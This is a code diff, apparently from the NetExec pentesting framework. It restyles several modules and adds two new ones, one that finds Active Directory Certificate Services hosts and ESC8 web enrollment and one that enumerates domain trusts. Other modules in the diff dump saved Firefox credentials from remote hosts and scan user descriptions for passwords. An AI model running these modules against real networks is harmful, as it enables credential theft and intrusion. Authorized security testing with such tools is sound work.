context.log.highlight(f"Found NOTHING!")
|
context.log.highlight("Found NOTHING!")
|
||||||
return
|
return
|
||||||
|
|
||||||
for item, data in results.items():
|
for item, data in results.items():
|
||||||
|
@ -148,7 +143,7 @@ class LsaLookupNames:
|
||||||
"""
|
"""
|
||||||
string_binding = string_binding or self.string_binding
|
string_binding = string_binding or self.string_binding
|
||||||
if not string_binding:
|
if not string_binding:
|
||||||
raise NotImplemented("String binding must be defined")
|
raise NotImplementedError("String binding must be defined")
|
||||||
|
|
||||||
rpc_transport = transport.DCERPCTransportFactory(string_binding)
|
rpc_transport = transport.DCERPCTransportFactory(string_binding)
|
||||||
|
|
||||||
|
@ -199,12 +194,11 @@ class LsaLookupNames:
|
||||||
request["PolicyHandle"] = policyHandle
|
request["PolicyHandle"] = policyHandle
|
||||||
request["Count"] = 1
|
request["Count"] = 1
|
||||||
name1 = RPC_UNICODE_STRING()
|
name1 = RPC_UNICODE_STRING()
|
||||||
name1["Data"] = "NT Service\{}".format(service)
|
name1["Data"] = f"NT Service\\{service}"
|
||||||
request["Names"].append(name1)
|
request["Names"].append(name1)
|
||||||
request["TranslatedSids"]["Sids"] = NULL
|
request["TranslatedSids"]["Sids"] = NULL
|
||||||
request["LookupLevel"] = lsat.LSAP_LOOKUP_LEVEL.LsapLookupWksta
|
request["LookupLevel"] = lsat.LSAP_LOOKUP_LEVEL.LsapLookupWksta
|
||||||
resp = dce.request(request)
|
return dce.request(request)
|
||||||
return resp
|
|
||||||
|
|
||||||
|
|
||||||
conf = {
|
conf = {
|
||||||
|
|
|
@ -0,0 +1,106 @@
|
||||||
|
from impacket.dcerpc.v5 import transport, epm
|
||||||
|
from impacket.http import AUTH_NTLM
|
||||||
|
from impacket.dcerpc.v5.rpch import RPC_PROXY_INVALID_RPC_PORT_ERR, \
|
||||||
|
RPC_PROXY_CONN_A1_0X6BA_ERR, RPC_PROXY_CONN_A1_404_ERR, \
|
||||||
|
RPC_PROXY_RPC_OUT_DATA_404_ERR
|
||||||
|
from impacket import uuid
|
||||||
|
import requests
|
||||||
|
|
||||||
|
|
||||||
|
class NXCModule:
|
||||||
|
"""
|
||||||
|
-------
|
||||||
|
Module by @0xjbb, original code from Impacket rpcdump.py
|
||||||
|
"""
|
||||||
|
KNOWN_PROTOCOLS = {
|
||||||
|
135: {"bindstr": r"ncacn_ip_tcp:%s[135]"},
|
||||||
|
139: {"bindstr": r"ncacn_np:%s[\pipe\epmapper]"},
|
||||||
|
443: {"bindstr": r"ncacn_http:[593,RpcProxy=%s:443]"},
|
||||||
|
445: {"bindstr": r"ncacn_np:%s[\pipe\epmapper]"},
|
||||||
|
593: {"bindstr": r"ncacn_http:%s"}
|
||||||
|
}
|
||||||
|
|
||||||
|
name = "enum_ca"
|
||||||
|
description = "Anonymously uses RPC endpoints to hunt for ADCS CAs"
|
||||||
|
supported_protocols = ["smb"] # Example: ['smb', 'mssql']
|
||||||
|
opsec_safe = True # Does the module touch disk?
|
||||||
|
multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time?
|
||||||
|
|
||||||
|
def __init__(self, context=None, module_options=None):
|
||||||
|
self.context = context
|
||||||
|
self.module_options = module_options
|
||||||
|
|
||||||
|
def options(self, context, module_options):
|
||||||
|
pass
|
||||||
|
|
||||||
|
def on_login(self, context, connection):
|
||||||
|
self.__username = connection.username
|
||||||
|
self.__password = connection.password
|
||||||
|
self.__domain = connection.domain
|
||||||
|
self.__lmhash = ""
|
||||||
|
self.__nthash = ""
|
||||||
|
self.__port = 135.
|
||||||
|
self.__stringbinding = ""
|
||||||
|
|
||||||
|
if context.hash and ":" in context.hash[0]:
|
||||||
|
hashList = context.hash[0].split(":")
|
||||||
|
self.__nthash = hashList[-1]
|
||||||
|
self.__lmhash = hashList[0]
|
||||||
|
elif context.hash and ":" not in context.hash[0]:
|
||||||
|
self.__nthash = context.hash[0]
|
||||||
|
self.__lmhash = "00000000000000000000000000000000"
|
||||||
|
|
||||||
|
self.__stringbinding = self.KNOWN_PROTOCOLS[self.__port]["bindstr"] % connection.host
|
||||||
|
context.log.debug(f"StringBinding {self.__stringbinding}")
|
||||||
|
|
||||||
|
rpctransport = transport.DCERPCTransportFactory(self.__stringbinding)
|
||||||
|
|
||||||
|
if self.__port in [139, 445]:
|
||||||
|
# Setting credentials for SMB
|
||||||
|
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
|
||||||
|
rpctransport.setRemoteHost(connection.host)
|
||||||
|
rpctransport.set_dport(self.__port)
|
||||||
|
elif self.__port in [443]:
|
||||||
|
# Setting credentials only for RPC Proxy, but not for the MSRPC level
|
||||||
|
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
|
||||||
|
rpctransport.set_auth_type(AUTH_NTLM)
|
||||||
|
else:
|
||||||
|
pass
|
||||||
|
|
||||||
|
try:
|
||||||
|
entries = self.__fetchList(rpctransport)
|
||||||
|
except Exception as e:
|
||||||
|
error_text = f"Protocol failed: {e}"
|
||||||
|
context.log.fail(error_text)
|
||||||
|
|
||||||
|
if RPC_PROXY_INVALID_RPC_PORT_ERR in error_text or \
|
||||||
|
RPC_PROXY_RPC_OUT_DATA_404_ERR in error_text or \
|
||||||
|
RPC_PROXY_CONN_A1_404_ERR in error_text or \
|
||||||
|
RPC_PROXY_CONN_A1_0X6BA_ERR in error_text:
|
||||||
|
context.log.fail("This usually means the target does not allow "
|
||||||
|
"to connect to its epmapper using RpcProxy.")
|
||||||
|
return
|
||||||
|
for entry in entries:
|
||||||
|
tmpUUID = str(entry["tower"]["Floors"][0])
|
||||||
|
|
||||||
|
if uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmpUUID))[:18] in epm.KNOWN_UUIDS:
|
||||||
|
exename = epm.KNOWN_UUIDS[uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmpUUID))[:18]]
|
||||||
|
context.log.debug("EXEs %s" % exename)
|
||||||
|
if exename == "certsrv.exe":
|
||||||
|
context.log.highlight("Active Directory Certificate Services Found.")
|
||||||
|
url = f"http://{connection.host}/certsrv/certfnsh.asp"
|
||||||
|
context.log.highlight(url)
|
||||||
|
try:
|
||||||
|
response = requests.get(url, timeout=5)
|
||||||
|
if response.status_code == 401 and "WWW-Authenticate" in response.headers and "ntlm" in response.headers["WWW-Authenticate"].lower():
|
||||||
|
context.log.highlight("Web enrollment found on HTTP (ESC8).")
|
||||||
|
except requests.RequestException as e:
|
||||||
|
context.log.debug(e)
|
||||||
|
return
|
||||||
|
|
||||||
|
def __fetchList(self, rpctransport):
|
||||||
|
dce = rpctransport.get_dce_rpc()
|
||||||
|
dce.connect()
|
||||||
|
resp = epm.hept_lookup(None, dce=dce)
|
||||||
|
dce.disconnect()
|
||||||
|
return resp
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from datetime import datetime
|
from datetime import datetime
|
||||||
from nxc.helpers.logger import write_log
|
from nxc.helpers.logger import write_log
|
||||||
|
|
||||||
|
@ -23,9 +20,7 @@ class NXCModule:
|
||||||
self.domains = None
|
self.domains = None
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
"""DOMAIN Domain to enumerate DNS for. Defaults to all zones."""
|
||||||
DOMAIN Domain to enumerate DNS for. Defaults to all zones.
|
|
||||||
"""
|
|
||||||
self.domains = None
|
self.domains = None
|
||||||
if module_options and "DOMAIN" in module_options:
|
if module_options and "DOMAIN" in module_options:
|
||||||
self.domains = module_options["DOMAIN"]
|
self.domains = module_options["DOMAIN"]
|
||||||
|
@ -34,15 +29,12 @@ class NXCModule:
|
||||||
if not self.domains:
|
if not self.domains:
|
||||||
domains = []
|
domains = []
|
||||||
output = connection.wmi("Select Name FROM MicrosoftDNS_Zone", "root\\microsoftdns")
|
output = connection.wmi("Select Name FROM MicrosoftDNS_Zone", "root\\microsoftdns")
|
||||||
|
domains = [result["Name"]["value"] for result in output] if output else []
|
||||||
if output:
|
context.log.success(f"Domains retrieved: {domains}")
|
||||||
for result in output:
|
|
||||||
domains.append(result["Name"]["value"])
|
|
||||||
|
|
||||||
context.log.success("Domains retrieved: {}".format(domains))
|
|
||||||
else:
|
else:
|
||||||
domains = [self.domains]
|
domains = [self.domains]
|
||||||
data = ""
|
data = ""
|
||||||
|
|
||||||
for domain in domains:
|
for domain in domains:
|
||||||
output = connection.wmi(
|
output = connection.wmi(
|
||||||
f"Select TextRepresentation FROM MicrosoftDNS_ResourceRecord WHERE DomainName = {domain}",
|
f"Select TextRepresentation FROM MicrosoftDNS_ResourceRecord WHERE DomainName = {domain}",
|
||||||
|
@ -70,6 +62,6 @@ class NXCModule:
|
||||||
context.log.highlight("\t" + d)
|
context.log.highlight("\t" + d)
|
||||||
data += "\t" + d + "\n"
|
data += "\t" + d + "\n"
|
||||||
|
|
||||||
log_name = "DNS-Enum-{}-{}.log".format(connection.host, datetime.now().strftime("%Y-%m-%d_%H%M%S"))
|
log_name = f"DNS-Enum-{connection.host}-{datetime.now().strftime('%Y-%m-%d_%H%M%S')}.log"
|
||||||
write_log(data, log_name)
|
write_log(data, log_name)
|
||||||
context.log.display(f"Saved raw output to ~/.nxc/logs/{log_name}")
|
context.log.display(f"Saved raw output to ~/.nxc/logs/{log_name}")
|
||||||
|
|
|
@ -0,0 +1,86 @@
|
||||||
|
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
||||||
|
|
||||||
|
|
||||||
|
class NXCModule:
|
||||||
|
"""
|
||||||
|
Extract all Trust Relationships, Trusting Direction, and Trust Transitivity
|
||||||
|
Module by Brandon Fisher @shad0wcntr0ller
|
||||||
|
"""
|
||||||
|
|
||||||
|
name = "enum_trusts"
|
||||||
|
description = "Extract all Trust Relationships, Trusting Direction, and Trust Transitivity"
|
||||||
|
supported_protocols = ["ldap"]
|
||||||
|
opsec_safe = True
|
||||||
|
multiple_hosts = True
|
||||||
|
|
||||||
|
def options(self, context, module_options):
|
||||||
|
pass
|
||||||
|
|
||||||
|
def on_login(self, context, connection):
|
||||||
|
search_filter = "(&(objectClass=trustedDomain))"
|
||||||
|
attributes = ["flatName", "trustPartner", "trustDirection", "trustAttributes"]
|
||||||
|
|
||||||
|
context.log.debug(f"Search Filter={search_filter}")
|
||||||
|
resp = connection.ldapConnection.search(searchFilter=search_filter, attributes=attributes, sizeLimit=0)
|
||||||
|
|
||||||
|
trusts = []
|
||||||
|
context.log.debug(f"Total of records returned {len(resp)}")
|
||||||
|
for item in resp:
|
||||||
|
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
|
||||||
|
continue
|
||||||
|
flat_name = ""
|
||||||
|
trust_partner = ""
|
||||||
|
trust_direction = ""
|
||||||
|
trust_transitive = []
|
||||||
|
try:
|
||||||
|
for attribute in item["attributes"]:
|
||||||
|
if str(attribute["type"]) == "flatName":
|
||||||
|
flat_name = str(attribute["vals"][0])
|
||||||
|
elif str(attribute["type"]) == "trustPartner":
|
||||||
|
trust_partner = str(attribute["vals"][0])
|
||||||
|
elif str(attribute["type"]) == "trustDirection":
|
||||||
|
if str(attribute["vals"][0]) == "1":
|
||||||
|
trust_direction = "Inbound"
|
||||||
|
elif str(attribute["vals"][0]) == "2":
|
||||||
|
trust_direction = "Outbound"
|
||||||
|
elif str(attribute["vals"][0]) == "3":
|
||||||
|
trust_direction = "Bidirectional"
|
||||||
|
elif str(attribute["type"]) == "trustAttributes":
|
||||||
|
trust_attributes_value = int(attribute["vals"][0])
|
||||||
|
if trust_attributes_value & 0x1:
|
||||||
|
trust_transitive.append("Non-Transitive")
|
||||||
|
if trust_attributes_value & 0x2:
|
||||||
|
trust_transitive.append("Uplevel-Only")
|
||||||
|
if trust_attributes_value & 0x4:
|
||||||
|
trust_transitive.append("Quarantined Domain")
|
||||||
|
if trust_attributes_value & 0x8:
|
||||||
|
trust_transitive.append("Forest Transitive")
|
||||||
|
if trust_attributes_value & 0x10:
|
||||||
|
trust_transitive.append("Cross Organization")
|
||||||
|
if trust_attributes_value & 0x20:
|
||||||
|
trust_transitive.append("Within Forest")
|
||||||
|
if trust_attributes_value & 0x40:
|
||||||
|
trust_transitive.append("Treat as External")
|
||||||
|
if trust_attributes_value & 0x80:
|
||||||
|
trust_transitive.append("Uses RC4 Encryption")
|
||||||
|
if trust_attributes_value & 0x100:
|
||||||
|
trust_transitive.append("Cross Organization No TGT Delegation")
|
||||||
|
if trust_attributes_value & 0x2000:
|
||||||
|
trust_transitive.append("PAM Trust")
|
||||||
|
if not trust_transitive:
|
||||||
|
trust_transitive.append("Other")
|
||||||
|
trust_transitive = ", ".join(trust_transitive)
|
||||||
|
|
||||||
|
if flat_name and trust_partner and trust_direction and trust_transitive:
|
||||||
|
trusts.append((flat_name, trust_partner, trust_direction, trust_transitive))
|
||||||
|
except Exception as e:
|
||||||
|
context.log.debug(f"Cannot process trust relationship due to error {e}")
|
||||||
|
|
||||||
|
if trusts:
|
||||||
|
context.log.success("Found the following trust relationships:")
|
||||||
|
for trust in trusts:
|
||||||
|
context.log.highlight(f"{trust[1]} -> {trust[2]} -> {trust[3]}")
|
||||||
|
else:
|
||||||
|
context.log.display("No trust relationships found")
|
||||||
|
|
||||||
|
return True
|
|
@ -1,16 +1,14 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
|
|
||||||
class NXCModule:
|
class NXCModule:
|
||||||
"""
|
"""
|
||||||
Example
|
Example:
|
||||||
|
-------
|
||||||
Module by @yomama
|
Module by @yomama
|
||||||
"""
|
"""
|
||||||
|
|
||||||
name = "example module"
|
name = "example module"
|
||||||
description = "I do something"
|
description = "I do something"
|
||||||
supported_protocols = [] # Example: ['smb', 'mssql']
|
supported_protocols = [] # Example: ['smb', 'mssql']
|
||||||
opsec_safe = True # Does the module touch disk?
|
opsec_safe = True # Does the module touch disk?
|
||||||
multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time?
|
multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time?
|
||||||
|
|
||||||
|
@ -22,7 +20,6 @@ class NXCModule:
|
||||||
"""Required.
|
"""Required.
|
||||||
Module options get parsed here. Additionally, put the modules usage here as well
|
Module options get parsed here. Additionally, put the modules usage here as well
|
||||||
"""
|
"""
|
||||||
pass
|
|
||||||
|
|
||||||
def on_login(self, context, connection):
|
def on_login(self, context, connection):
|
||||||
"""Concurrent.
|
"""Concurrent.
|
||||||
|
@ -30,43 +27,39 @@ class NXCModule:
|
||||||
"""
|
"""
|
||||||
# Logging best practice
|
# Logging best practice
|
||||||
# Mostly you should use these functions to display information to the user
|
# Mostly you should use these functions to display information to the user
|
||||||
context.log.display("I'm doing something") # Use this for every normal message ([*] I'm doing something)
|
context.log.display("I'm doing something") # Use this for every normal message ([*] I'm doing something)
|
||||||
context.log.success("I'm doing something") # Use this for when something succeeds ([+] I'm doing something)
|
context.log.success("I'm doing something") # Use this for when something succeeds ([+] I'm doing something)
|
||||||
context.log.fail("I'm doing something") # Use this for when something fails ([-] I'm doing something), for example a remote registry entry is missing which is needed to proceed
|
context.log.fail("I'm doing something") # Use this for when something fails ([-] I'm doing something), for example a remote registry entry is missing which is needed to proceed
|
||||||
context.log.highlight("I'm doing something") # Use this for when something is important and should be highlighted, printing credentials for example
|
context.log.highlight("I'm doing something") # Use this for when something is important and should be highlighted, printing credentials for example
|
||||||
|
|
||||||
# These are for debugging purposes
|
# These are for debugging purposes
|
||||||
context.log.info("I'm doing something") # This will only be displayed if the user has specified the --verbose flag, so add additional info that might be useful
|
context.log.info("I'm doing something") # This will only be displayed if the user has specified the --verbose flag, so add additional info that might be useful
|
||||||
context.log.debug("I'm doing something") # This will only be displayed if the user has specified the --debug flag, so add info that you would might need for debugging errors
|
context.log.debug("I'm doing something") # This will only be displayed if the user has specified the --debug flag, so add info that you would might need for debugging errors
|
||||||
|
|
||||||
# These are for more critical error handling
|
# These are for more critical error handling
|
||||||
context.log.error("I'm doing something") # This will not be printed in the module context and should only be used for critical errors (e.g. a required python file is missing)
|
context.log.error("I'm doing something") # This will not be printed in the module context and should only be used for critical errors (e.g. a required python file is missing)
|
||||||
try:
|
try:
|
||||||
raise Exception("Exception that might occure")
|
raise Exception("Exception that might have occurred")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.exception(f"Exception occured: {e}") # This will display an exception traceback screen after an exception was raised and should only be used for critical errors
|
context.log.exception(f"Exception occurred: {e}") # This will display an exception traceback screen after an exception was raised and should only be used for critical errors
|
||||||
|
|
||||||
def on_admin_login(self, context, connection):
|
def on_admin_login(self, context, connection):
|
||||||
"""Concurrent.
|
"""Concurrent.
|
||||||
Required if on_login is not present
|
Required if on_login is not present
|
||||||
This gets called on each authenticated connection with Administrative privileges
|
This gets called on each authenticated connection with Administrative privileges
|
||||||
"""
|
"""
|
||||||
pass
|
|
||||||
|
|
||||||
def on_request(self, context, request):
|
def on_request(self, context, request):
|
||||||
"""Optional.
|
"""Optional.
|
||||||
If the payload needs to retrieve additional files, add this function to the module
|
If the payload needs to retrieve additional files, add this function to the module
|
||||||
"""
|
"""
|
||||||
pass
|
|
||||||
|
|
||||||
def on_response(self, context, response):
|
def on_response(self, context, response):
|
||||||
"""Optional.
|
"""Optional.
|
||||||
If the payload sends back its output to our server, add this function to the module to handle its output
|
If the payload sends back its output to our server, add this function to the module to handle its output
|
||||||
"""
|
"""
|
||||||
pass
|
|
||||||
|
|
||||||
def on_shutdown(self, context, connection):
|
def on_shutdown(self, context, connection):
|
||||||
"""Optional.
|
"""Optional.
|
||||||
Do something on shutdown
|
Do something on shutdown
|
||||||
"""
|
"""
|
||||||
pass
|
|
||||||
|
|
|
@ -1,85 +1,80 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
import socket
|
import socket
|
||||||
|
from nxc.logger import nxc_logger
|
||||||
|
from impacket.ldap.ldap import LDAPSearchError
|
||||||
|
from impacket.ldap.ldapasn1 import SearchResultEntry
|
||||||
import sys
|
import sys
|
||||||
|
|
||||||
class NXCModule:
|
|
||||||
'''
|
|
||||||
Module by CyberCelt: @Cyb3rC3lt
|
|
||||||
|
|
||||||
Initial module:
|
class NXCModule:
|
||||||
https://github.com/Cyb3rC3lt/CrackMapExec-Modules
|
"""
|
||||||
'''
|
Module by CyberCelt: @Cyb3rC3lt
|
||||||
|
|
||||||
name = 'find-computer'
|
Initial module:
|
||||||
description = 'Finds computers in the domain via the provided text'
|
https://github.com/Cyb3rC3lt/CrackMapExec-Modules
|
||||||
supported_protocols = ['ldap']
|
"""
|
||||||
|
|
||||||
|
name = "find-computer"
|
||||||
|
description = "Finds computers in the domain via the provided text"
|
||||||
|
supported_protocols = ["ldap"]
|
||||||
opsec_safe = True
|
opsec_safe = True
|
||||||
multiple_hosts = False
|
multiple_hosts = False
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
'''
|
"""
|
||||||
find-computer: Specify find-computer to call the module
|
find-computer: Specify find-computer to call the module
|
||||||
TEXT: Specify the TEXT option to enter your text to search for
|
TEXT: Specify the TEXT option to enter your text to search for
|
||||||
Usage: nxc ldap $DC-IP -u Username -p Password -M find-computer -o TEXT="server"
|
Usage: nxc ldap $DC-IP -u Username -p Password -M find-computer -o TEXT="server"
|
||||||
nxc ldap $DC-IP -u Username -p Password -M find-computer -o TEXT="SQL"
|
nxc ldap $DC-IP -u Username -p Password -M find-computer -o TEXT="SQL"
|
||||||
'''
|
"""
|
||||||
|
self.TEXT = ""
|
||||||
|
|
||||||
self.TEXT = ''
|
if "TEXT" in module_options:
|
||||||
|
self.TEXT = module_options["TEXT"]
|
||||||
if 'TEXT' in module_options:
|
|
||||||
self.TEXT = module_options['TEXT']
|
|
||||||
else:
|
else:
|
||||||
context.log.error('TEXT option is required!')
|
context.log.error("TEXT option is required!")
|
||||||
exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
def on_login(self, context, connection):
|
def on_login(self, context, connection):
|
||||||
|
search_filter = f"(&(objectCategory=computer)(&(|(operatingSystem=*{self.TEXT}*))(name=*{self.TEXT}*)))"
|
||||||
# Building the search filter
|
|
||||||
searchFilter = "(&(objectCategory=computer)(&(|(operatingSystem=*"+self.TEXT+"*)(name=*"+self.TEXT+"*))))"
|
|
||||||
|
|
||||||
try:
|
try:
|
||||||
context.log.debug('Search Filter=%s' % searchFilter)
|
context.log.debug(f"Search Filter={search_filter}")
|
||||||
resp = connection.ldapConnection.search(searchFilter=searchFilter,
|
resp = connection.ldapConnection.search(searchFilter=search_filter, attributes=["dNSHostName", "operatingSystem"], sizeLimit=0)
|
||||||
attributes=['dNSHostName','operatingSystem'],
|
except LDAPSearchError as e:
|
||||||
sizeLimit=0)
|
if e.getErrorString().find("sizeLimitExceeded") >= 0:
|
||||||
except ldap_impacket.LDAPSearchError as e:
|
context.log.debug("sizeLimitExceeded exception caught, giving up and processing the data received")
|
||||||
if e.getErrorString().find('sizeLimitExceeded') >= 0:
|
|
||||||
context.log.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
|
|
||||||
resp = e.getAnswers()
|
resp = e.getAnswers()
|
||||||
pass
|
|
||||||
else:
|
else:
|
||||||
logging.debug(e)
|
nxc_logger.debug(e)
|
||||||
return False
|
return False
|
||||||
|
|
||||||
answers = []
|
answers = []
|
||||||
context.log.debug('Total no. of records returned %d' % len(resp))
|
context.log.debug(f"Total no. of records returned: {len(resp)}")
|
||||||
for item in resp:
|
for item in resp:
|
||||||
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
|
if isinstance(item, SearchResultEntry) is not True:
|
||||||
continue
|
continue
|
||||||
dNSHostName = ''
|
dns_host_name = ""
|
||||||
operatingSystem = ''
|
operating_system = ""
|
||||||
try:
|
try:
|
||||||
for attribute in item['attributes']:
|
for attribute in item["attributes"]:
|
||||||
if str(attribute['type']) == 'dNSHostName':
|
if str(attribute["type"]) == "dNSHostName":
|
||||||
dNSHostName = str(attribute['vals'][0])
|
dns_host_name = str(attribute["vals"][0])
|
||||||
elif str(attribute['type']) == 'operatingSystem':
|
elif str(attribute["type"]) == "operatingSystem":
|
||||||
operatingSystem = attribute['vals'][0]
|
operating_system = attribute["vals"][0]
|
||||||
if dNSHostName != '' and operatingSystem != '':
|
if dns_host_name != "" and operating_system != "":
|
||||||
answers.append([dNSHostName,operatingSystem])
|
answers.append([dns_host_name, operating_system])
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.debug("Exception:", exc_info=True)
|
context.log.debug("Exception:", exc_info=True)
|
||||||
context.log.debug('Skipping item, cannot process due to error %s' % str(e))
|
context.log.debug(f"Skipping item, cannot process due to error {e}")
|
||||||
pass
|
|
||||||
if len(answers) > 0:
|
if len(answers) > 0:
|
||||||
context.log.success('Found the following computers: ')
|
context.log.success("Found the following computers: ")
|
||||||
for answer in answers:
|
for answer in answers:
|
||||||
try:
|
try:
|
||||||
IP = socket.gethostbyname(answer[0])
|
ip = socket.gethostbyname(answer[0])
|
||||||
context.log.highlight(u'{} ({}) ({})'.format(answer[0],answer[1],IP))
|
context.log.highlight(f"{answer[0]} ({answer[1]}) ({ip})")
|
||||||
context.log.debug('IP found')
|
context.log.debug("IP found")
|
||||||
except socket.gaierror as e:
|
except socket.gaierror:
|
||||||
context.log.debug('Missing IP')
|
context.log.debug("Missing IP")
|
||||||
context.log.highlight(u'{} ({}) ({})'.format(answer[0],answer[1],"No IP Found"))
|
context.log.highlight(f"{answer[0]} ({answer[1]}) (No IP Found)")
|
||||||
else:
|
else:
|
||||||
context.log.success('Unable to find any computers with the text "' + self.TEXT + '"')
|
context.log.success(f"Unable to find any computers with the text {self.TEXT}")
|
||||||
|
|
|
@ -1,4 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
from dploot.lib.target import Target
|
from dploot.lib.target import Target
|
||||||
from nxc.protocols.smb.firefox import FirefoxTriage
|
from nxc.protocols.smb.firefox import FirefoxTriage
|
||||||
|
|
||||||
|
@ -18,7 +17,6 @@ class NXCModule:
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""Dump credentials from Firefox"""
|
"""Dump credentials from Firefox"""
|
||||||
pass
|
|
||||||
|
|
||||||
def on_admin_login(self, context, connection):
|
def on_admin_login(self, context, connection):
|
||||||
host = connection.hostname + "." + connection.domain
|
host = connection.hostname + "." + connection.domain
|
||||||
|
@ -50,8 +48,7 @@ class NXCModule:
|
||||||
firefox_credentials = firefox_triage.run()
|
firefox_credentials = firefox_triage.run()
|
||||||
for credential in firefox_credentials:
|
for credential in firefox_credentials:
|
||||||
context.log.highlight(
|
context.log.highlight(
|
||||||
"[%s][FIREFOX] %s %s:%s"
|
"[{}][FIREFOX] {} {}:{}".format(
|
||||||
% (
|
|
||||||
credential.winuser,
|
credential.winuser,
|
||||||
credential.url + " -" if credential.url != "" else "-",
|
credential.url + " -" if credential.url != "" else "-",
|
||||||
credential.username,
|
credential.username,
|
||||||
|
@ -59,4 +56,4 @@ class NXCModule:
|
||||||
)
|
)
|
||||||
)
|
)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.debug("Error while looting firefox: {}".format(e))
|
context.log.debug(f"Error while looting firefox: {e}")
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
||||||
from impacket.ldap import ldap as ldap_impacket
|
from impacket.ldap import ldap as ldap_impacket
|
||||||
import re
|
import re
|
||||||
|
@ -34,7 +31,7 @@ class NXCModule:
|
||||||
self.MINLENGTH = module_options["MINLENGTH"]
|
self.MINLENGTH = module_options["MINLENGTH"]
|
||||||
if "PASSWORDPOLICY" in module_options:
|
if "PASSWORDPOLICY" in module_options:
|
||||||
self.PASSWORDPOLICY = True
|
self.PASSWORDPOLICY = True
|
||||||
self.regex = re.compile("((?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*\d)|(?=[^ ]*[a-z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])|(?=[^ ]*[A-Z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])|(?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*[^\w \n]))[^ \n]{" + self.MINLENGTH + ",}") # Credit : https://stackoverflow.com/questions/31191248/regex-password-must-have-at-least-3-of-the-4-of-the-following
|
self.regex = re.compile(r"((?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*\d)|(?=[^ ]*[a-z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])|(?=[^ ]*[A-Z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])|(?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*[^\w \n]))[^ \n]{" + self.MINLENGTH + ",}") # Credit : https://stackoverflow.com/questions/31191248/regex-password-must-have-at-least-3-of-the-4-of-the-following
|
||||||
|
|
||||||
def on_login(self, context, connection):
|
def on_login(self, context, connection):
|
||||||
"""Concurrent. Required if on_admin_login is not present. This gets called on each authenticated connection"""
|
"""Concurrent. Required if on_admin_login is not present. This gets called on each authenticated connection"""
|
||||||
|
@ -42,7 +39,7 @@ class NXCModule:
|
||||||
searchFilter = "(objectclass=user)"
|
searchFilter = "(objectclass=user)"
|
||||||
|
|
||||||
try:
|
try:
|
||||||
context.log.debug("Search Filter=%s" % searchFilter)
|
context.log.debug(f"Search Filter={searchFilter}")
|
||||||
resp = connection.ldapConnection.search(
|
resp = connection.ldapConnection.search(
|
||||||
searchFilter=searchFilter,
|
searchFilter=searchFilter,
|
||||||
attributes=["sAMAccountName", "description"],
|
attributes=["sAMAccountName", "description"],
|
||||||
|
@ -54,13 +51,12 @@ class NXCModule:
|
||||||
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
|
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
|
||||||
# paged queries
|
# paged queries
|
||||||
resp = e.getAnswers()
|
resp = e.getAnswers()
|
||||||
pass
|
|
||||||
else:
|
else:
|
||||||
nxc_logger.debug(e)
|
nxc_logger.debug(e)
|
||||||
return False
|
return False
|
||||||
|
|
||||||
answers = []
|
answers = []
|
||||||
context.log.debug("Total of records returned %d" % len(resp))
|
context.log.debug(f"Total of records returned {len(resp)}")
|
||||||
for item in resp:
|
for item in resp:
|
||||||
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
|
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
|
||||||
continue
|
continue
|
||||||
|
@ -76,13 +72,12 @@ class NXCModule:
|
||||||
answers.append([sAMAccountName, description])
|
answers.append([sAMAccountName, description])
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.debug("Exception:", exc_info=True)
|
context.log.debug("Exception:", exc_info=True)
|
||||||
context.log.debug("Skipping item, cannot process due to error %s" % str(e))
|
context.log.debug(f"Skipping item, cannot process due to error {e!s}")
|
||||||
pass
|
|
||||||
answers = self.filter_answer(context, answers)
|
answers = self.filter_answer(context, answers)
|
||||||
if len(answers) > 0:
|
if len(answers) > 0:
|
||||||
context.log.success("Found following users: ")
|
context.log.success("Found following users: ")
|
||||||
for answer in answers:
|
for answer in answers:
|
||||||
context.log.highlight("User: {} description: {}".format(answer[0], answer[1]))
|
context.log.highlight(f"User: {answer[0]} description: {answer[1]}")
|
||||||
|
|
||||||
def filter_answer(self, context, answers):
|
def filter_answer(self, context, answers):
|
||||||
